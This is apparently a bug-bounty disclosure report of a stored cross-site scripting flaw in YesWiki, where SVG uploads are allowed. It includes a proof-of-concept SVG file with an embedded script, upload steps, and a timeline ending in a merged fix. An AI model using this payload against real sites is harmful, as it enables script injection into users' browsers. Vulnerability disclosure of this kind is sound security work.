Unrestricted Upload of File with Dangerous Type in yeswiki/yeswiki

Valid

Reported on

Oct 5th 2021


Description

Uploaded files represent a significant risk to applications. The first step in many attacks is to get some code to the system to be attacked. Then the attack only needs to find a way to get the code executed. Using a file upload helps the attacker to inject javascript code via SVG uploads. https://github.com/YesWiki/yeswiki/ is vulnerable to Unrestricted Upload of File with Dangerous Type as shown below:

Proof of concept

Vuln variable: $allowedExtensions
Snippet:

    $att = new attach($this);

    // list of valid extensions, ex. array("jpeg", "xml", "bmp")
    $allowedExtensions = array_keys($this->config['authorized-extensions']);
  

$allowedExtensions allows svg to upload and xss

Payload

Create an image called poc.svg with the following content:

<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd">
<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg" width="100" height="100">
<circle cx="50" cy="50" r="40" stroke="green" stroke-width="4" fill="yellow" />
<polygon id="triangle" points="100,100 100,500 500,100" fill="#009900" stroke="#004400"/>
<script type="text/javascript">
alert('XSS attacks');
</script>
</svg>

Login to yeswiki and edit homepage http://localhost/yeswiki-doryphore/?HomePage/edit Upload the created file and save Clic the circle and observe XSS

Impact

The consequences of unrestricted file upload can vary, including complete system takeover, an overloaded file system or database, forwarding attacks to back-end systems, client-side attacks, or simple defacement. It depends on what the application does with the uploaded file and especially where it is stored.

We have contacted a member of the yeswiki team and are waiting to hear back 8 months ago
We have sent a third and final follow up to the yeswiki team. This report is now considered stale. 7 months ago
Jérémy Dufraisse validated this vulnerability 3 months ago
hitisec has been awarded the disclosure bounty
The fix bounty is now up for grabs
Jérémy Dufraisse confirmed that a fix has been merged on aa060a 3 months ago
The fix bounty has been dropped
to join this conversation